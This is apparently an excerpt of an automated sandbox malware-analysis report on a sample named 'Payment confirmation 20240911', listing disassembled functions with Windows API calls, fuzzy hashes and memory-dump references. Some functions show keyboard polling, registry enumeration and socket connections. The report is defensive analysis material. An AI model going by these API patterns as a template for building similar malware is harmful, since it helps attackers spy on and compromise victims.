                                          • InterlockedDecrement.KERNEL32(?,01396818,0000000C,01301B9D,00000000,?,01309CAD,000000FF,?,00000000), ref: 0130813C
                                          • _free.LIBCMT ref: 0130814F
                                          • InterlockedIncrement.KERNEL32(00753A28,01396818,0000000C,01301B9D,00000000,?,01309CAD,000000FF,?,00000000), ref: 01308167
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                          • String ID: (:u
                                          • API String ID: 2704283638-3436811648
                                          • Opcode ID: da9552fcb1d19d6b7f99656b9db0885c31696934b6a112177a2e75cb5ca030c4
                                          • Instruction ID: 56d9491fae5c40a7489c1463b4aa01b8205425ee2525bb5784030c26f2cc2afc
                                          • Opcode Fuzzy Hash: da9552fcb1d19d6b7f99656b9db0885c31696934b6a112177a2e75cb5ca030c4
                                          • Instruction Fuzzy Hash: 0901C031D06612EBDB2BAF6D94297AABBE4BF40B1CF050189E510677C0C7746801CFD1
                                          Function 01341836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 013418E4
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 01341917
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 01341A3A
                                          • CloseHandle.KERNEL32(?), ref: 01341AB0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 922a9ab969f83c9dac9096da0734e953ed5b716c53996a7129d68170c7424fb7
                                          • Instruction ID: 1d955929dcc6ffe89dffbc466f41d59b1de8fb4e30b06deb23f543ec35c37694
                                          • Opcode Fuzzy Hash: 922a9ab969f83c9dac9096da0734e953ed5b716c53996a7129d68170c7424fb7
                                          • Instruction Fuzzy Hash: 2D816071A50215EBEF24DF64C885BADBBF9EF48724F048059EA05AF381D7B5F9408B90
                                          Function 01340579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 013405DF
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0134066E
                                          • GetProcAddress.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 0134068C
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 013406D2
                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 013406EC
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0132AEA5,?,?,00000000,00000008), ref: 012FF282
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0132AEA5,?,?,00000000,00000008), ref: 012FF2A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 576acc485145e384d8a85d178bdd3c536199aa64e04f68bf2a4af94208e6ac77
                                          • Instruction ID: a8e13ddf82d1bf6d173692c867b4e51c296f58178fc7ac50046cff1a19cddcd5
                                          • Opcode Fuzzy Hash: 576acc485145e384d8a85d178bdd3c536199aa64e04f68bf2a4af94208e6ac77
                                          • Instruction Fuzzy Hash: 36516879A0020ADFCB04EFA8C4949EDBBF8EF59314F548059EA56AB350DB34ED05CB80
                                          Function 01342D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342DE0
                                          • RegOpenKeyExW.ADVAPI32 ref: 01342E1F
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01342E66
                                          • RegCloseKey.ADVAPI32(?), ref: 01342E92
                                          • RegCloseKey.ADVAPI32(00000000), ref: 01342E9F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 397b14c3aaad5a6006c50638a180f032349a060c68daec533f4d874d46877da9
                                          • Instruction ID: d3ce6cb204653455c7c524bfa74cb249c38313dbd5bd7f041db3e641c9bd5fa5
                                          • Opcode Fuzzy Hash: 397b14c3aaad5a6006c50638a180f032349a060c68daec533f4d874d46877da9
                                          • Instruction Fuzzy Hash: 8F519D31218205AFD714EFA8C894E7BB7E8FF98308F40491DF595972A0DB31E905CB52
                                          Function 01331726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 013317D4
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 013317FD
                                          • WritePrivateProfileSectionW.KERNEL32 ref: 0133183C
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • WritePrivateProfileStringW.KERNEL32 ref: 01331861
                                          • WritePrivateProfileStringW.KERNEL32 ref: 01331869
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: a1d0361b7d081f84bd248fc63cc05564888bd65e148dba0de8741d19a80e960e
                                          • Instruction ID: 2369240607d098ab0530ecd6d38db4c39fb972b8cef50a338f3a562121d9925a
                                          • Opcode Fuzzy Hash: a1d0361b7d081f84bd248fc63cc05564888bd65e148dba0de8741d19a80e960e
                                          • Instruction Fuzzy Hash: 2A413935A10209DFCF11EF64C984AADBBF5FF58314B148099E94AAB361DB31ED01DB60
                                          Function 012FB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(000000FF), ref: 012FB749
                                          • ScreenToClient.USER32(00000000,000000FF), ref: 012FB766
                                          • GetAsyncKeyState.USER32 ref: 012FB78B
                                          • GetAsyncKeyState.USER32 ref: 012FB799
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 79be3415d1304d835f5ba5c585a8f1c4705369b04bbca900dc01c672bc5fab96
                                          • Instruction ID: 86babe54af79bb13f85dc1a2f70cc6af9abef2fc192060111db99f15db7a8a2a
                                          • Opcode Fuzzy Hash: 79be3415d1304d835f5ba5c585a8f1c4705369b04bbca900dc01c672bc5fab96
                                          • Instruction Fuzzy Hash: ED41827661411AFFDF199F68C844EE9FBB4FB05724F148369E929A22D0C730AA50DB90
                                          Function 0131C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0131C156
                                          • PostMessageW.USER32 ref: 0131C200
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0131C208
                                          • PostMessageW.USER32 ref: 0131C216
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0131C21E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: a4f8cc090d5f64f5171918ff6804b9dcd0dce0d78c59ea286e6af11b7f3c0e90
                                          • Instruction ID: a2da48825f341e51a724b9e1c5c8b8e951d4b0a6da952f312b50655301c3eb8d
                                          • Opcode Fuzzy Hash: a4f8cc090d5f64f5171918ff6804b9dcd0dce0d78c59ea286e6af11b7f3c0e90
                                          • Instruction Fuzzy Hash: D931C37168021DEBDF18CFACDD4CA9E3BB9EB04329F104229F965A71D5C7B09914CB90
                                          Function 0131E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0131E9CD
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0131E9EA
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0131EA22
                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 0131EA48
                                          • _wcsstr.LIBCMT ref: 0131EA52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: 0902ddc6c57d368a14dd0c2041d68fc66eb8a11d2960531e55fe05f52d8db7d8
                                          • Instruction ID: 52cdb891de87e76b5249bb273b570ca1f91a0bb355d7f0893d5a6cb85a16207e
                                          • Opcode Fuzzy Hash: 0902ddc6c57d368a14dd0c2041d68fc66eb8a11d2960531e55fe05f52d8db7d8
                                          • Instruction Fuzzy Hash: 232107726042447AFB2B9B6DDC48E7B7FEDDF45764F008039FC09CA094DA62D8408350
                                          Function 0134DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134DCC0
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,00000000,?,0133407D,00000000,?,00000000), ref: 0134DCE4
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,00000000,?,0133407D,00000000,?,00000000), ref: 0134DCFC
                                          • GetSystemMetrics.USER32(00000004,?,?,?,?,?,00000000,?,0133407D,00000000,?,00000000), ref: 0134DD24
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0134DD42
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: a620572410f9880f1c86af87e2e6065cc7cbae0935213850c561593842e44a84
                                          • Instruction ID: 397a4dbc07ca3ee90e1cb09b9ae609e52c77517b8374528e76d9876241eeeb8f
                                          • Opcode Fuzzy Hash: a620572410f9880f1c86af87e2e6065cc7cbae0935213850c561593842e44a84
                                          • Instruction Fuzzy Hash: 1F21B071600216AFDB215EBD9C48B657BE8FF66368F104724FA66D65E0D770A8108B90
                                          Function 0131CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0131CA86
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0131CAB8
                                          • __itow.LIBCMT ref: 0131CAD0
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0131CAF6
                                          • __itow.LIBCMT ref: 0131CB07
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: cefa63a1b5cf9f10a8a5b8b8399320c599a7c5efa672ac1809e8ab25bcd3eeac
                                          • Instruction ID: b21e882e2b9d54154fc21201ec0aa885dde06d848740e5d056df80c56b6191dc
                                          • Opcode Fuzzy Hash: cefa63a1b5cf9f10a8a5b8b8399320c599a7c5efa672ac1809e8ab25bcd3eeac
                                          • Instruction Fuzzy Hash: 312108367806047BDF26EAA98C49EEF7BEDAF59714F40A024FA05E7185D6708D05C3A1
                                          Function 01339122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0133ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0133ACF5
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01339160
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0133916F
                                          • connect.WSOCK32(00000000,?,00000010), ref: 0133918B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLastconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 3701255441-0
                                          • Opcode ID: 62db43abd9c58a71dd1af5555e131162347e3aa66172135f92d865a7a116d883
                                          • Instruction ID: 5f53d4d3b0d60c1289116b8df3a44fd1453362c9970fdcd702415651c51bc2c1
                                          • Opcode Fuzzy Hash: 62db43abd9c58a71dd1af5555e131162347e3aa66172135f92d865a7a116d883
                                          • Instruction Fuzzy Hash: 022190317002159FDB10AFA8C888B7E77ADEF89728F04845DE956EB395DBB4E8018B51
                                          Function 013389AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 013389CE
                                          • GetForegroundWindow.USER32 ref: 013389E5
                                          • GetDC.USER32(00000000), ref: 01338A21
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 01338A2D
                                          • ReleaseDC.USER32(00000000,00000003), ref: 01338A68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: 28860aaa975f4d054b1c63c109241a1069122c599543bbf76cd551d076d7acec
                                          • Instruction ID: 2c00ad984f5ae17a1fdffdcc1bbeb22164da22a4831715d3b539b516906378d3
                                          • Opcode Fuzzy Hash: 28860aaa975f4d054b1c63c109241a1069122c599543bbf76cd551d076d7acec
                                          • Instruction Fuzzy Hash: 8E219675B00205AFD714EFA9D888AAABBF9EF48315F04C479E94A97361CB70AD00CB50
                                          Function 012FB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012FB5EB
                                          • SelectObject.GDI32(?,00000000), ref: 012FB5FA
                                          • BeginPath.GDI32(?), ref: 012FB611
                                          • SelectObject.GDI32(?,00000000), ref: 012FB63B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: d7d57160dc85057995f52c3b49ed82783c5c0381879ff785ced0c7843cc880b7
                                          • Instruction ID: 58680782d1afc156610344b9ebdf484c5f9bb42d8c01e5cef8a5108b97d0936e
                                          • Opcode Fuzzy Hash: d7d57160dc85057995f52c3b49ed82783c5c0381879ff785ced0c7843cc880b7
                                          • Instruction Fuzzy Hash: 3221A171920305EFDB319F59E9487A9BFECFB00755F54422AFB5092198C7B88491CF50
                                          Function 01302E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __calloc_crt.LIBCMT ref: 01302E81
                                          • CreateThread.KERNEL32(?,?,01302FB7,00000000,?,?), ref: 01302EC5
                                          • GetLastError.KERNEL32 ref: 01302ECF
                                          • _free.LIBCMT ref: 01302ED8
                                          • __dosmaperr.LIBCMT ref: 01302EE3
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                          • String ID:
                                          • API String ID: 2664167353-0
                                          • Opcode ID: 2b84e1f607111ea332776b73d3818f69bd313e856d804073d13c87bfa8755ea1
                                          • Instruction ID: 7ef4c6d5231cdbe78b193f5a92812979900cee2138417955ff6ae992a23d6278
                                          • Opcode Fuzzy Hash: 2b84e1f607111ea332776b73d3818f69bd313e856d804073d13c87bfa8755ea1
                                          • Instruction Fuzzy Hash: 8E11C8321047066FDB23AFADEC54D6B7BD8EF44778B100429FA58861D1DB31D801C760
                                          Function 0131B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0131B903
                                          • GetLastError.KERNEL32(?,0131B3CB,?,?,?), ref: 0131B90D
                                          • GetProcessHeap.KERNEL32(00000008,?,?,0131B3CB,?,?,?), ref: 0131B91C
                                          • HeapAlloc.KERNEL32(00000000,?,0131B3CB,?,?,?), ref: 0131B923
                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0131B93A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: 65189a7598cc356cd67ae2c50e585e9c03893345f54ea2296d1b1659c881b53b
                                          • Instruction ID: 4c2a0f370849efa231ea92adad3aedf29b65f14b8c3a30575118d51ddd606613
                                          • Opcode Fuzzy Hash: 65189a7598cc356cd67ae2c50e585e9c03893345f54ea2296d1b1659c881b53b
                                          • Instruction Fuzzy Hash: 2A016D71201205BFDF254FA9DC88D6B7FBDEF8A768B104029F585C2164DA718C51DB60
                                          Function 01328355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01328371
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0132837F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01328387
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01328391
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 013283CD
